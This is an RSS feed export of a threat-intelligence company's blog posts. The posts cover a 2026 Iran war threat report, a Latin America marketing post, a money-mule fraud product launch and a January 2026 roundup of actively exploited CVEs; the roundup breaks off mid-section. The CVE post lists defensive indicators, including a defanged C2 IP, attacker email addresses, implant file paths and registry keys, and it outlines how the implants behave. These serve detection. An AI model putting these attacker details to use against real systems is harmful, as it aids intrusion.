<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>Recorded Future</title>
        <link>https://www.recordedfuture.com</link>
        <description>Strengthen Your Defenses with Threat Intelligence</description>
        <lastBuildDate>Mon, 09 Mar 2026 22:30:15 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>Recorded Future, Inc.</generator>
        <language>en</language>
        <copyright>Copyright © 2026 Recorded Future, Inc.</copyright>
        <atom:link href="https://www.recordedfuture.com/feed" rel="self" type="application/rss+xml"/>
        <item>
            <title><![CDATA[The Iran War: What You Need to Know]]></title>
            <link>https://www.recordedfuture.com/blog/the-iran-war-what-you-need-to-know</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/the-iran-war-what-you-need-to-know</guid>
            <pubDate>Mon, 09 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group tracks the cyber, physical, and geopolitical components of the US-Israeli strikes on Iran — with continuously updated threat analysis and scenarios.]]></description>
            <content:encoded><![CDATA[
        <p><em>Last updated on 9 March 2026 at 2230 GMT.</em></p>
        <p>Recorded Future's Insikt Group® is actively monitoring the rapidly evolving situation following coordinated US-Israeli strikes against Iran, the death of Supreme Leader Ali Khamenei and the widening regional war. This analysis serves as a continuously updated compilation on the geopolitical, cyber and influence operation aspects of the war, including key indicators to watch in the coming days, weeks and months.</p>
        <p>This report will be of greatest interest to organizations in the US, Israel, and Gulf states concerned about targeting by Iranian state-sponsored or state-aligned threat actors, as well as those with exposure to energy markets, maritime shipping, and critical infrastructure potentially impacted by regional escalation.</p>
        <h2>The Latest Areas to Watch</h2>
        <p>Three things to watch right now:</p>
        <ul>
          <li><strong>Mojtaba Khamenei's first address to the nation.</strong> This is the single most important near-term signal. Whether his tone is defiant, pragmatic, or obliquely conciliatory will reveal whether any room for negotiation exists — and substantially change the picture for regional stability.</li>
          <li><strong>The Internet blackout lifting and the cyber re-operationalization window.</strong> When connectivity is restored, expect scanning, brute forcing, password spraying, and probing against previously untargeted networks as early signals of Iranian cyber forces returning to operational tempo.</li>
          <li><strong>Three scenarios remain in play</strong> — and are not mutually exclusive. A swift US military exit, a negotiated Venezuela-style deal, or internal revolution and fragmentation each carry distinct risk profiles.</li>
        </ul>
        <h3>Iran's Leadership Situation</h3>
        <p>Mojtaba Khamenei, son of the late Ali Khamenei, has been elected as Supreme Leader. His election is expected to preserve hardliner continuity and underscores the IRGC's political power — they were able to shape the outcome in favor of their preferred candidate despite reported objections from some clerics. Mojtaba himself appears to have been wounded in US-Israeli strikes that killed his father, mother, wife, and one son.</p>
        <p>What this means strategically: Mojtaba is neither a credible Islamic scholar nor an experienced administrator — the two traditional prerequisites for the position. He lacks the authority his father spent two decades consolidating. For now, Iran is effectively being run by committee. Key power brokers include IRGC chief Vahidi, parliamentary speaker Ghalibaf, and overall security head Larijani. These individuals are realists, even if labeled hardliners, and have a broader range of options before them than Khamenei Senior ever permitted.</p>
        <p>There is also visible tension between political leadership and the IRGC. President Pezeshkian's public apology over the weekend for strikes on Iran's neighbors drew immediate backlash from hardliners and military leaders — a reflection of the weakness of the elected government, not a sign of internal fracturing. The IRGC is driving wartime strategy.</p>
        <p>Iran faces two paths: pursue a deal with the US that normalizes economic engagement and offers a path to regime survival — or endure the bombing, crack down domestically, export enough oil to China and India to sustain the patronage system, and wait for the geopolitical environment to shift. Mojtaba's first address to the nation will be the most significant near-term signal of which direction Iran is leaning.</p>
        <h2>Cyber Threat Landscape</h2>
        <p>Insikt Group continues to observe a near-term reduction in Iran's more advanced cyber activity since March 1. The Internet blackout across much of Iran has likely impeded operational tempo and coordination among state-sponsored groups. However, treat this period as a window in which Iran-aligned operators are regrouping, prioritizing recovery and defense, and setting conditions for future operations — not as a sign of diminished threat.</p>
        <p>It is worth separating espionage-grade operations from the broader pro-Iran ecosystem. Some groups have gone quiet; others remain active. Critically, not all groups need to operate from within Iran's borders.</p>
        <p>Recent confirmed activity:</p>
        <ul>
          <li>A pro-Iranian cyberattack was launched against Jordanian public silos and supply infrastructure around <a href="https://ukragroconsult.com/en/news/jordan-thwarts-iranian-cyberattack-on-national-wheat-silos/">March 1</a></li>
          <li>A malicious Android application mimicking a missile warning system was disseminated to Israeli civilians via <a href="https://www.scworld.com/brief/trojanized-israeli-rocket-warning-app-spread-in-cyberespionage-campaign">SMS</a> — currently under investigation and validation by Insikt Group</li>
          <li>These are considered outliers in what is likely to become a far more robust retaliation once Iran emerges from the Internet blackout</li>
        </ul>
        <h3>Groups to Track</h3>
        <p>State-sponsored: Insikt Group is actively monitoring Green Bravo (APT42), Green Golf, Cotton Sandstorm, and Cyber Avengers. These groups are capable of advanced network and vulnerability scanning, opportunistic exploitation of known vulnerabilities, deployment of disruptive and destructive malware, and satellite or television broadcast hijacks — the latter particularly likely given their psychological impact.</p>
        <p>Hacktivist fronts: The Handala Hack Team and the Conquerors Electronic Army operate in a hybrid space blending hacktivism, cyber intrusions, and influence operations. Typical TTPs include web defacements, DDoS targeting government and critical infrastructure, hack-and-leak operations, and doxing of officials and political figures. These groups are likely to be the first to resume traditional operational tempo as the blackout lifts.</p>
        <p>Also watch: Peach Sandstorm, APT34, MuddyWater, and Moses Staff each have established patterns for initial access and lateral movement. Watch for new hacktivist fronts emerging — this is typically a signal of where Iran is directing its efforts, as seen with Homeland Justice in Albania and Moses Staff targeting Israel.</p>
        <p><strong>Three Areas to Monitor</strong></p>
        <p><em>Intent to Recalibrate.</em> After this round of hostilities, cyber operations will likely expand to include new regional targets, mirroring what we've seen on the kinetic front. Iranian cyber groups will likely be active across new targeted networks and operationalized for disruptive use.</p>
        <p><em>Proliferation.</em> In line with that recalibration, Iranian cyber groups will likely be tasked to acquire and deploy more disruptive capabilities.</p>
        <p><em>Time.</em> Iran is currently experiencing a digital blackout, and cyber operations are likely impacted as a result. There are already reports suggesting aerial bombardments have hit at least one facility used by a major group. If cyber centers remain intact, Iran will still require time to re-operationalize — and if more physical centers have been targeted, that timeline extends further. For historical context: after the Qasem Soleimani killing in January 2020, Iran took approximately two months before launching what became multi-year, highly targeted campaigns against Israeli government, private sector, and academic institutions.</p>
        <p><strong>Targeted Industries</strong></p>
        <p>Critical infrastructure, government, defense, and the defense industrial base will be at the top of the targeting list. US critical infrastructure is absolutely part of that target set — Iranian APT groups are known to be opportunistic, acquiring exploits and collaborating with ransomware groups to gain network access, and the threshold for retaliation following Khamenei's death will be very high. Pro-Iran hacktivist groups — including Handala Hack Team, Cyber Islamic Resistance, RipperSec, APT IRAN, and Cyber Fattah — have announced coordinated cyber operations against Israeli and regional targets. While large-scale independently verified intrusions had not been confirmed as of March 9, organizations should not mistake this for low risk.</p>
        <p>Watch for each major group's distinct TTPs: Peach Sandstorm, APT34, MuddyWater, Cotton Sandstorm, and APT42 each have established patterns for initial access and lateral movement. Also watch for new hacktivist fronts emerging — this is typically a signal of where Iran is directing its efforts, as seen previously with Homeland Justice in Albania and Moses Staff targeting Israel.</p>
        <p><strong>What to Watch</strong></p>
        <p>When the digital blackout lifts, look for scanning, brute forcing, password spraying, and probing against your networks as early signals of Iranian cyber forces re-operationalizing. A temporal overlap between the blackout lifting and increased probing against previously untargeted networks would be a significant indicator. DDoS campaigns may also be an early signal. Ensure all public-facing technologies are patched — you can't control geopolitics, but you can control your exposure.</p>
        <p>Additionally, watch for infrastructure repurposing: groups known for traditional espionage may suddenly shift to IO-driven domains, as seen after June 2025 when espionage infrastructure pivoted to hybrid theft-and-influence operations.</p>
        <div>
          <div>
            <div>
              <h2>Expert Assessment: What Happens Next</h2>
              <p><em>Based on analysis from Dr. Christopher Ahlberg’s conversation with former MI6 Director Sir Alex Younger.</em></p>
              <p>Three scenarios are in play — not mutually exclusive, and each with distinct implications for organizations managing risk.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Scenario 1 — Bomb, Declare Victory, and Leave</h3>
              <p>The US achieves air supremacy, conducts a sustained campaign of precision strikes against remaining target banks, forces the Strait of Hormuz open using naval power, and exits. The suppressive effect on Iranian will and capacity — particularly once B-52s can operate over Iran with impunity — should not be underestimated. This scenario has a faster resolution timeline but risks leaving unresolved instability.</p>
              <p>Resilience question: What is the operational and financial impact of a 30- to 60-day Strait closure across our critical dependencies?</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Scenario 2 — A “Venezuela-Style” Deal</h3>
              <p>This is assessed as the scenario Trump is most actively angling for. Iran's new leadership — cornered economically, facing military degradation, and aware that 80% of government revenue derives from hydrocarbons now at risk — has strong incentives to negotiate. Pezeshkian's public apology, the IRGC's repudiation of it, and Trump's calls for unconditional surrender may be the opening moves of a negotiation rather than signs of irreconcilable positions. Any deal would almost certainly require zero enrichment and the transfer of Iran's 400-plus kilograms of highly enriched uranium.</p>
              <p>Resilience question: If a deal emerges within weeks, how does your organization's risk posture need to shift — and are your stakeholders prepared for rapid de-escalation as well as escalation?</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Scenario 3 — Revolution or Fragmentation</h3>
              <p>Revolutions always appear unthinkable before they happen and inevitable afterward. No obvious opposition leader has emerged, but fragmentation doesn't always begin at the center. Given Iran's profound ethnic diversity, insurgencies could take hold in the periphery. This is the highest-uncertainty, highest-consequence scenario. The street-level infrastructure for suppressing domestic unrest remains stubbornly intact — but the Iranian population knows this regime ordered mass killings of unarmed protesters, and something is permanently broken in that relationship.</p>
              <p>Resilience question: Are we prepared for high-impact, low-probability incidents such as sudden infrastructure disruption, terrorist violence, or regional fragmentation affecting operations across Iraq, the Gulf, and beyond?</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1639b94af082849a6929a572441c5012d6e2eb22d.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Latin America's Cybersecurity Turning Point: From Reactive Defense to Threat Intelligence]]></title>
            <link>https://www.recordedfuture.com/blog/latin-america-cybersecurity-turning-point</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/latin-america-cybersecurity-turning-point</guid>
            <pubDate>Tue, 03 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Latin America's threat landscape is evolving fast — and reactive defense is no longer enough. PIX fraud, ransomware, and targeted attacks are outpacing overstretched security teams. Recorded Future provides LATAM-specific intelligence, automation, and seamless integrations to help your team get ahead of threats before they hit.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Latin America faces a distinct and evolving cyber threat landscape, from PIX payment fraud to ransomware hitting critical infrastructure.</li>
          <li>Most LATAM security teams are still reactive by necessity, and that posture is costing organizations in downtime, data, and trust.</li>
          <li>Recorded Future offers LATAM-specific threat intelligence, automation, and 100+ integrations to help stretched teams get ahead of attacks before they land.</li>
          <li>Meet us at RSA Booth N-6090 to see how intelligence-led security can transform your team's posture, from response to prevention.</li>
          <li>Join our upcoming webinar to learn what proactive intelligence looks like for your region.<br />Understanding the Dark Covenant, Its Evolution, and Impact</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_17ffeff1c5b7cfe37313bfcf34dda6673c3c7026d.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Recorded Future Expands Coverage of Scams and Financial Fraud with Money Mule Intelligence from CYBERA]]></title>
            <link>https://www.recordedfuture.com/blog/recorded-future-money-mule-intelligence-cybera</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/recorded-future-money-mule-intelligence-cybera</guid>
            <pubDate>Thu, 26 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future is expanding its payment fraud prevention capabilities through a partnership with CYBERA, the industry leader in detecting and verifying data on scam-linked bank accounts.]]></description>
            <content:encoded><![CDATA[
        <p>Recorded Future is expanding its payment fraud prevention capabilities through a partnership with <a href="https://www.cybera.io/company/contact">CYBERA</a>, the industry leader in detecting and verifying data on scam-linked bank accounts.</p>
        <p>Available for purchase now via the Recorded Future Platform, Money Mule Intelligence helps fraud teams identify the accounts criminals use to extract and move stolen funds—addressing a critical gap as scams increasingly become banks' most pressing fraud challenge.</p>
        <h2><strong>The Growing Threat of Authorized Push Payment Fraud</strong></h2>
        <p>Authorized Push Payment (APP) fraud is accelerating. In the U.S., APP fraud losses are projected to reach nearly $15B by 2028, up from $8.3B in 2024, according to <a href="https://www.deloitte.com/us/en/insights/industry/financial-services/authorized-push-payment-fraud.html">Deloitte</a>. While traditional card fraud continues to decline, APP fraud is climbing, fueled by AI-generated deepfakes, personalized scam scripts, and instant payment systems like FedNow and Zelle that move money faster than conventional fraud controls can intercept it.</p>
        <p>Mule accounts, or money mules, are part of the critical infrastructure that makes these scams possible. They provide the bridge that converts stolen payments into untraceable cash or cryptocurrency. Without them, most APP fraud would collapse because criminals cannot risk receiving funds directly into their own accounts. By the time victims realize they've been scammed, mule accounts have already moved the money through multiple layers, typically ending in cash withdrawals or crypto conversions.</p>
        <p>Additionally, the sophistication of mule operations is increasing. Criminal organizations now employ "mule herders" who manage hundreds of accounts at once, using AI to simulate normal transaction behavior (grocery purchases, streaming subscriptions, etc.) so accounts don't appear dormant or suspicious. This makes detection through traditional pattern analysis increasingly difficult.</p>
        <p>Regulators are responding by shifting liability to banks, often viewing those allowing mule accounts to operate as part of the criminal infrastructure itself. For example, the UK now requires banks to reimburse scam victims and allows them to delay suspicious payments for investigation, while U.S. regulators are signaling that banks may be held liable for failing to detect mule accounts.</p>
        <p>Detecting mule accounts is fundamentally difficult. They’re designed to blend in with legitimate activity, and traditional fraud controls can struggle to distinguish between a genuine customer payment and a scam transfer until it's too late.</p>
        <h2><strong>CYBERA's Approach to Mule Intelligence</strong></h2>
        <p>The challenge of detecting and disrupting mule account networks is what led CYBERA's founders to build their solution. Coming from legal practice and law enforcement, CYBERA's leadership team worked scam cases where they witnessed how recovery becomes impossible once funds move through the financial system. They realized that money mule networks represent a central vulnerability in the scam economy, one that banks had limited visibility into.</p>
        <p>Today, CYBERA helps banks and payment networks disrupt scams at the point where funds are extracted. CYBERA's AI-powered Scam Engagement System generates intelligence on bank accounts and payment endpoints actively used by scam networks.</p>
        <p>Unlike probabilistic risk scoring, CYBERA verifies each account, providing evidence and contextual metadata to enable proactive prevention across both internal accounts and outbound payments while minimizing false positives.</p>
        <p>CYBERA supports two core use cases:</p>
        <ul>
          <li><strong>On-Us Mule Detection</strong>, which helps identify mule accounts held at your institution that are already linked to confirmed scam activity. This enables early detection and disruption of high-risk accounts, reducing downstream fraud, repeat victimization, and regulatory exposure within a bank’s accountholders.</li>
          <li><strong>Off-Us Screening</strong>, which screens outbound payments to external beneficiary accounts before execution, helping to prevent customers from sending funds to scammer-controlled accounts. This is particularly valuable for high-value transfers, social engineering attacks, and customer-initiated payments where traditional controls are limited.</li>
        </ul>
        <p>Large financial institutions have already prevented multiple six-figure losses by embedding CYBERA’s intelligence into their transaction monitoring workflows. CYBERA has also been accepted as a member of the Mastercard Start Path program, making it the first Recorded Future partner to achieve this distinction and further validating its role in the payments ecosystem.</p>
        <h2><strong>How Money Mule Intelligence Expands Payment Fraud Intelligence</strong></h2>
        <p><a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Payment Fraud Intelligence</a> (PFI) correlates the widest set of disparate, pre-monetization indicators of fraud to help teams act before their customers are impacted. Money Mule Intelligence extends that capability, giving fraud teams the verified intelligence needed to make high-confidence decisions that disrupt scams by flagging accounts that have been confirmed as mule infrastructure through direct investigation. Together, they provide coverage from initial compromise through attempted cash-out, helping fraud teams prevent losses at multiple intervention points.</p>
        <div>
          <div>
            <div>“Securing payments requires more than reacting to fraud — it requires anticipating it. Integrating Money Mule Intelligence strengthens our ability to illuminate the infrastructure behind financial crime, which is fully aligned with our strategy of securing payments with intelligence.”</div>
          </div>
          <div>
            <div>
              <p><strong>Jamie Zajac</strong></p>
              <p>Chief Product Officer at Recorded Future</p>
            </div>
          </div>
        </div>
        <p>As regulators increasingly expect banks to prevent scam-enabled transfers, Money Mule Intelligence provides the verified data needed to comply with emerging reimbursement requirements while reducing the operational burden of post-incident investigation and remediation.</p>
        <p>PFI users that purchase this capability, can now act on both sides of the transaction—compromised payment instruments and scam-linked receiving accounts—with evidence-backed intelligence that minimizes false positives and aligns with the industry's shift toward proactive fraud prevention.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1f90928a17759f89a1ada2a65299215200ab27b00.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day]]></title>
            <link>https://www.recordedfuture.com/blog/january-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/january-2026-cve-landscape</guid>
            <pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[January 2026 saw 23 actively exploited CVEs, including APT28’s Microsoft Office zero-day and critical auth bypass flaws impacting enterprise systems.]]></description>
            <content:encoded><![CDATA[
        <p>January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>APT28's Operation Neusploit:</strong> Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants</li>
          <li><strong>Microsoft and SmarterTools lead concerns:</strong> These vendors accounted for 30% of January's vulnerabilities, with multiple critical authentication bypass and RCE flaws</li>
          <li><strong>Public exploits proliferate:</strong> Fourteen of the 23 vulnerabilities reported have public proof-of-concept exploit code available</li>
          <li><strong>Code Injection dominates:</strong> CWE-94 (Code Injection) was the most common weakness type, followed by CWE-288 (Authentication Bypass Using an Alternate Path or Channel) and CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</li>
        </ul>
        <p><strong>Bottom line:</strong> The slight increase masks significant threats. APT28's zero-day exploitation and multiple critical authentication bypass flaws demonstrate that threat actors continue targeting enterprise communication and management platforms for initial access and persistence.</p>
        <h2>Quick Reference Table</h2>
        <p><em>All 23 vulnerabilities below were actively exploited in January 2026.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20029">CVE-2026-20029</a></div>
            <div>99</div>
            <div>Cisco Identity Services Engine Software</div>
            <div>CWE-611 (Improper Restriction of XML External Entity Reference)</div>
            <div>No</div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20805">CVE-2026-20805</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20805&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="http://CVE-2026-20931">CVE-2026-20931</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-73 (External Control of File Name or Path)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-23550">CVE-2026-23550</a></div>
            <div>99</div>
            <div>Modular DS Plugin</div>
            <div>CWE-266 (Incorrect Privilege Assignment)</div>
            <div><a href="https://github.com/search?q=CVE-2026-23550&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24061">CVE-2026-24061</a></div>
            <div>99</div>
            <div>GNU InetUtils</div>
            <div>CWE-88 (Argument Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-24061&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20045">CVE-2026-20045</a></div>
            <div>99</div>
            <div>Cisco Unified Communications Manager</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20045&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-23760">CVE-2026-23760</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div><a href="https://github.com/search?q=CVE-2026-23760&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24423">CVE-2026-24423</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div><a href="https://github.com/search?q=CVE-2026-23760&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-21509">CVE-2026-21509</a></div>
            <div>99</div>
            <div>Microsoft Office</div>
            <div>CWE-807 (Reliance on Untrusted Inputs in a Security Decision)</div>
            <div><a href="https://github.com/search?q=CVE-2026-21509&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24858">CVE-2026-24858</a></div>
            <div>99</div>
            <div>Fortinet Multiple Products</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div><a href="https://github.com/search?q=CVE-2026-24858&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-40551">CVE-2025-40551</a></div>
            <div>99</div>
            <div>SolarWinds Web Help Desk</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div>No</div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-1281">CVE-2026-1281</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager Mobile (EPMM)</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-1281&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-1340">CVE-2026-1340</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager Mobile (EPMM)</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-1340&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>14</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2018-14634">CVE-2018-14634</a></div>
            <div>99</div>
            <div>Linux Kernel</div>
            <div>CWE-190 (Integer Overflow or Wraparound)</div>
            <div><a href="https://github.com/search?q=CVE-2018-14634&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>15</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-52691">CVE-2025-52691</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-434 (Unrestricted Upload of File with Dangerous Type)</div>
            <div><a href="https://github.com/search?q=CVE-2025-52691&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>16</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2024-37079">CVE-2024-37079</a></div>
            <div>99</div>
            <div>Broadcom VMware vCenter Server</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div>No</div>
          </div>
          <div>
            <div>17</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-68645">CVE-2025-68645</a></div>
            <div>99</div>
            <div>Synacor Zimbra Collaboration Suite (ZCS)</div>
            <div>CWE-98 (PHP Remote File Inclusion)</div>
            <div><a href="https://github.com/search?q=CVE-2025-68645&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>18</div>
            <div><a href="http://CVE-2025-34026">CVE-2025-34026</a></div>
            <div>99</div>
            <div>Versa Concerto</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div>No</div>
          </div>
          <div>
            <div>19</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-31125">CVE-2025-31125</a></div>
            <div>99</div>
            <div>Vite Vitejs</div>
            <div>CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-284 (Improper Access Control)</div>
            <div><a href="https://github.com/search?q=CVE-2025-31125&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>20</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-54313">CVE-2025-54313</a></div>
            <div>99</div>
            <div>Prettier eslint-config-prettier</div>
            <div>CWE-506 (Embedded Malicious Code)</div>
            <div>No</div>
          </div>
          <div>
            <div>21</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-8110">CVE-2025-8110</a></div>
            <div>89</div>
            <div>Gogs</div>
            <div>CWE-22 (Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-8110&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>22</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2009-0556">CVE-2009-0556</a></div>
            <div>89</div>
            <div>Microsoft Office</div>
            <div>CWE-94 (Code Injection)</div>
            <div>No</div>
          </div>
          <div>
            <div>23</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-37164">CVE-2025-37164</a></div>
            <div>89</div>
            <div>Hewlett Packard Enterprise OneView</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-37164&amp;type=repositories">Yes</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in January based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends in January 2026</h2>
        <h3>Affected Vendors</h3>
        <ul>
          <li><strong>Microsoft</strong> faced four critical vulnerabilities across Windows and Office products, including APT28's zero-day exploitation of CVE-2026-21509</li>
          <li><strong>SmarterTools</strong> accounted for three critical vulnerabilities affecting SmarterMail, all enabling authentication bypass or RCE</li>
          <li><strong>Cisco</strong> saw two critical flaws in Identity Services Engine and Unified Communications Manager</li>
          <li><strong>Ivanti</strong> dealt with two pre-authentication RCE vulnerabilities in Endpoint Manager Mobile</li>
          <li>Additional affected vendors/projects: Fortinet, SolarWinds, Broadcom, Synacor, Versa, Hewlett Packard Enterprise, GNU, Linux, Vite, Prettier, Gogs, and Modular DS</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-94</strong> – Code Injection</li>
          <li><strong>CWE-288</strong> – Authentication Bypass Using an Alternate Path or Channel</li>
          <li><strong>CWE-200</strong> – Exposure of Sensitive Information to an Unauthorized Actor</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong>APT28's Operation Neusploit</strong> <strong>marked January's most sophisticated campaign:</strong></p>
        <ul>
          <li>Exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files</li>
          <li>Deployed MiniDoor, a malicious Outlook VBA project designed to collect and forward victim emails to hardcoded addresses</li>
          <li>Deployed PixyNetLoader, which staged additional components and culminated in a Covenant Grunt implant</li>
          <li>Abused Filen API as a C2 bridge between the implant and actor-controlled Covenant listener</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2026-21509 | Microsoft Office</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | Active exploitation by APT28</p>
        <p><strong>Why this matters:</strong> Zero-day exploitation by Russian state-sponsored actors bypasses Office security features, enabling delivery of email collection implants and backdoors. The vulnerability stems from reliance on untrusted inputs in security decisions, allowing unauthorized attackers to bypass OLE mitigations.</p>
        <p><strong>Affected versions:</strong> Microsoft 365 and Microsoft Office (versions not specified in advisory)</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Install Microsoft's out-of-band update released January 26, 2026</li>
          <li>Search email systems for RTF attachments with embedded malicious droppers</li>
          <li>Check for modifications to %appdata%\Microsoft\Outlook\VbaProject.OTM</li>
          <li>Review registry keys: HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level, Software\Microsoft\Office\16.0\Outlook\Options\General\PONT_STRING, and Software\Microsoft\Office\16.0\Outlook\LoadMacroProviderOnBoot</li>
          <li>Monitor for connections to 213[.]155[.]157[.]123:443 and remote connectivity to Microsoft Office CDN endpoints</li>
          <li>Hunt for scheduled tasks named "OneDriveHealth" and suspicious files in %programdata%\Microsoft\OneDrive\setup\Cache\SplashScreen.png</li>
          <li>Block email addresses: ahmeclaw2002@outlook[.]com and ahmeclaw@proton[.]me</li>
        </ul>
        <div>
          <div>
            <div>
